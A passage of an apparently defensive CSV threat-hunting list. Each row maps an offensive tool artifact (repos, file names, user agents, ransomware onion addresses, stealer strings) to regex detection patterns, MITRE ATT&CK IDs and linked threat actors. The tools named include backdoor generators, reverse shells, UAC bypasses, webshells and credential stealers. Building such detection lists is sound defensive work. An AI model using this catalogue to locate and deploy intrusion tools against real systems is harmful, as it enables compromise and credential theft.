"*AnErrupTion/LoGiC.NET*",".{0,1000}AnErrupTion\/LoGiC\.NET.{0,1000}","offensive_tool_keyword","LoGiC.NET","A more advanced free and open .NET obfuscator using dnlib","T1001","TA0011","N/A","N/A","Defense Evasion","https://github.com/AnErrupTion/LoGiC.NET","1","1","N/A","N/A","5","6","513","80","2023-08-23T09:55:54Z","2019-12-27T09:48:50Z","33877" "*Anevicon*",".{0,1000}Anevicon.{0,1000}","offensive_tool_keyword","Anevicon","Attack simulation: Anevicon is a high-performance traffic generator. designed to be as convenient and reliable as it is possible. It sends numerous UDP-packets to a victim. 
thereby simulating an activity that can be produced by your end users or a group of hackers.","T1498 - T1497 - T1496","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/rozgo/anevicon","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","33878" "*AngelSecurityTeam/BackHAck*",".{0,1000}AngelSecurityTeam\/BackHAck.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","1","#linux","N/A","10","10","108","34","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z","33879" "*AngelSecurityTeam/Cam-Hackers*",".{0,1000}AngelSecurityTeam\/Cam\-Hackers.{0,1000}","offensive_tool_keyword","Cam-Hackers","Hack Cameras CCTV FREE","T1125","TA0007","N/A","N/A","Discovery","https://github.com/AngelSecurityTeam/Cam-Hackers","1","1","N/A","N/A","6","10","2025","512","2024-08-06T18:49:02Z","2019-11-16T18:49:35Z","33880" "*AngelSecurityTeam-BackdoorLinux*",".{0,1000}AngelSecurityTeam\-BackdoorLinux.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","1","#linux","N/A","10","10","108","34","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z","33881" "*AngelSecurityTeam-BackdoorWindows.exe*",".{0,1000}AngelSecurityTeam\-BackdoorWindows\.exe.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","0","#linux","N/A","10","10","108","34","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z","33882" "*AngelSecurityTeam-BackdoorWindows.exe*",".{0,1000}AngelSecurityTeam\-BackdoorWindows\.exe.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV 
.py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","1","#linux","N/A","10","10","108","34","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z","33883" "*ANGRYPUPPY2.cna*",".{0,1000}ANGRYPUPPY2\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","N/A","10","10","316","87","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z","33885" 
"*aniqfakhrul/powerview.py*",".{0,1000}aniqfakhrul\/powerview\.py.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","1","N/A","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","33886" "*aniqfakhrull@gmail.com*",".{0,1000}aniqfakhrull\@gmail\.com.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","#email","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","33887" "*Ani-Shell | C0d3d by lionaneesh*",".{0,1000}Ani\-Shell\s\|\sC0d3d\sby\slionaneesh.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","33888" "*anonsurf.py*",".{0,1000}anonsurf\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1059 - T1078 - T1105 - T1110 - T1566","TA0002 - TA0008 - TA0009 - TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","N/A","10","52217","5629","2025-03-03T15:17:19Z","2020-04-11T09:21:31Z","33889" "*ansible2john.py*",".{0,1000}ansible2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","33890" 
"*anthemtotheego/Detect-Hooks*",".{0,1000}anthemtotheego\/Detect\-Hooks.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","N/A","10","10","158","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z","33891" "*anthemtotheego/SharpSploitConsole*",".{0,1000}anthemtotheego\/SharpSploitConsole.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 
- T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","1","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","33892" "*antirez/hping*",".{0,1000}antirez\/hping.{0,1000}","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","1","N/A","N/A","N/A","10","1533","341","2024-07-10T12:38:39Z","2012-06-13T17:41:54Z","33893" "*AntivirusBypass.psm1*",".{0,1000}AntivirusBypass\.psm1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","33894" "*antiword FUZZ*",".{0,1000}antiword\sFUZZ.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation 
tool","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","7","1","68","9","2024-09-15T22:43:02Z","2021-09-17T14:40:07Z","33895" "*antonioCoco/ConPtyShell*",".{0,1000}antonioCoco\/ConPtyShell.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","33896" "*antonioCoco/JuicyPotatoNG*",".{0,1000}antonioCoco\/JuicyPotatoNG.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","33897" "*antonioCoco/RemotePotato0*",".{0,1000}antonioCoco\/RemotePotato0.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","1","N/A","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","33898" "*antonioCoco/RoguePotato*",".{0,1000}antonioCoco\/RoguePotato.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","N/A","10","10","1081","131","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z","33899" "*antonioCoco/RogueWinRM*",".{0,1000}antonioCoco\/RogueWinRM.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit 
that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","1","N/A","N/A","10","8","788","107","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z","33900" "*antonioCoco/RunasCs*",".{0,1000}antonioCoco\/RunasCs.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","33901" "*antonioCoco/SspiUacBypass*",".{0,1000}antonioCoco\/SspiUacBypass.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","N/A","10","5","433","56","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z","33902" "*antoniomika/sish*",".{0,1000}antoniomika\/sish.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. 
HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","33903" "*AntSword JSP*",".{0,1000}AntSword\sJSP.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#content","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","33904" "*antSword/v2.0*",".{0,1000}antSword\/v2\.0.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#useragent","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","33905" "*antSword/v2.1*",".{0,1000}antSword\/v2\.1.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#useragent","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","33906" "*AntSwordProject/antSword*",".{0,1000}AntSwordProject\/antSword.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - 
APT15","C2","https://github.com/AntSwordProject/antSword","1","1","N/A","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","33907" "*anypotato.exe*",".{0,1000}anypotato\.exe.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","33916" "*aoacugmutagkwctu.onion*",".{0,1000}aoacugmutagkwctu\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","33923" "*aodkkagnadcbobfpggfnjeongemjbjca*",".{0,1000}aodkkagnadcbobfpggfnjeongemjbjca.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","33924" "*AoratosWin*.zip*",".{0,1000}AoratosWin.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","N/A","2","120","16","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z","33926" "*AoratosWin.csproj*",".{0,1000}AoratosWin\.csproj.{0,1000}","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","N/A","2","120","16","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z","33927" "*AoratosWin.exe*",".{0,1000}AoratosWin\.exe.{0,1000}","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","N/A","2","120","16","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z","33928" "*AoratosWin.git*",".{0,1000}AoratosWin\.git.{0,1000}","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","N/A","2","120","16","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z","33929" "*AoratosWin.sln*",".{0,1000}AoratosWin\.sln.{0,1000}","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","N/A","2","120","16","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z","33930" "*AoratosWin_*.zip*",".{0,1000}AoratosWin_.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","N/A","2","120","16","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z","33931" "*apache_felix_remote_shell*",".{0,1000}apache_felix_remote_shell.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","33932" "*APC_Ijnect_Load.nim*",".{0,1000}APC_Ijnect_Load\.nim.{0,1000}","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","N/A","10","10","656","121","2025-02-18T14:31:45Z","2021-01-19T15:57:01Z","33933" "*apedx765p-stoedx765re.jsedx765on*",".{0,1000}apedx765p\-stoedx765re\.jsedx765on.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","33935" "*apex2john.py*",".{0,1000}apex2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper 
jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","33936" "*apfs_encrypted_volume_passwd.md*",".{0,1000}apfs_encrypted_volume_passwd\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","33937" "*api.truesocks.net*",".{0,1000}api\.truesocks\.net.{0,1000}","offensive_tool_keyword","TrueSocks","Simple API for buying renting and managing proxies","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","Defense Evasion","https://github.com/c0dn/truesocks_rs","1","1","N/A","N/A","10","1","0","0","2023-05-09T01:00:05Z","2023-04-06T02:32:04Z","33947" "*API::installHook() - Windows keyboard hook could not be 
installed!*",".{0,1000}API\:\:installHook\(\)\s\-\sWindows\skeyboard\shook\scould\snot\sbe\sinstalled!.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","#content","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","33949" "*api_username = """"redtiger1337""""*",".{0,1000}api_username\s\=\s\""redtiger1337\"".{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#content","N/A","9","","N/A","","","","33951" "*APIHookInjectorBin.exe*",".{0,1000}APIHookInjectorBin\.exe.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","33953" "*APIHookInjectorBin.log*",".{0,1000}APIHookInjectorBin\.log.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","#logfile","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","33954" 
"*APIHookInjectorBin.pdb*",".{0,1000}APIHookInjectorBin\.pdb.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","33955" "*APIHookInjectorBin.sln*",".{0,1000}APIHookInjectorBin\.sln.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","33956" "*aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion*",".{0,1000}aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","33959" "*aploium/shootback*",".{0,1000}aploium\/shootback.{0,1000}","offensive_tool_keyword","shootback","a reverse TCP tunnel let you access target behind NAT or firewall","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/aploium/shootback","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","962","234","2020-09-12T07:31:56Z","2016-04-28T15:12:36Z","33960" 
"*apokryptein/secinject*",".{0,1000}apokryptein\/secinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - 